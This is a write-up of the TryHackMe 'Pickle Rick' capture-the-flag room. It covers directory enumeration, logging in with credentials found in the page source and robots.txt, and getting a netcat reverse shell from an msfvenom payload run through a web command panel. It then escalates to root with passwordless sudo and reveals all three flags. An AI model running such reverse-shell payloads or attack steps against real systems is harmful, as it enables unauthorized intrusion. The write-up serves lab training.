Pickle Rick CTF – Writeup

This is a CTF on TryHackMe website.

The task is that you will have to help Pickle Rick find 3 ingredients so he can turn himself back into a human.

When you deploy the machine you are presented with a website.

Enumeration stage

The first thing I like to do is look at the source code. We find a username: R1ckRul3s.

We can look for any hidden directories. I like to use Gobuster for this task. The command I´ll use is:

gobuster dir -u http://10.10.222.6 -w /usr/share/wordlists/dirb/common.txt -q

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/assets (Status: 301)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)

In /robots.txt we find something interesting.

Wubbalubbadubdub

It is smart to use other tools aswell, and not just rely on one. You can use photon, raccoon or Nikto for example. I will use Nikto with the command:

nikto -h 10.10.222.6

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.222.6
+ Target Hostname:    ip-10-10-222-6.eu-west-1.compute.internal
+ Target Port:        80
+ Start Time:         2021-05-22 23:49:17 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x426 0x5818ccf125686 
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2021-05-22 23:49:26 (GMT1) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We find an admin login page, /login.php.

From previous enumeration we found the username, and from robots.txt we would assume that that would be the password.

After logging in, we are presented with this.


Gaining Access

The other tabs only says that: Only the real rick can enter.

We will try out some commands, like ls.

We found the first ingredient. Lets try and cat it.

That dosent work. Iinstead I will try and create a reverse shell to the webserver instead.

We can use msvenom to generate a revershell payload that we can try and run.

root@ip-10-10-235-26:~# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.235.26 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 94 bytes
mkfifo /tmp/siank; nc 10.10.83.119 4444 0</tmp/siank | /bin/sh >/tmp/siank 2>&1; rm /tmp/siank

I will setup netcat so it listens to port 4444 and execute the command on the website. This will give me a reverse Shell, and I can try and read the files again.

root@ip-10-10-235-26:~# nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.10.222.6 35688 received!@
ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair

The clue says: Look around the file system for the other ingredient.

cd home
ls
rick
ubuntu
cd rick
ls
second ingredients
cat second\\ ingredients
1 jerry tear

We can try and see if the user is in sudoers. There is no password for sudo, which is not good.

sudo su
su - root
mesg: ttyname failed: Inappropriate ioctl for device
whoami
root
cd /root
ls
3rd.txt
snap
cat 3rd.txt
3rd ingredients: fleeb juice

Similar Posts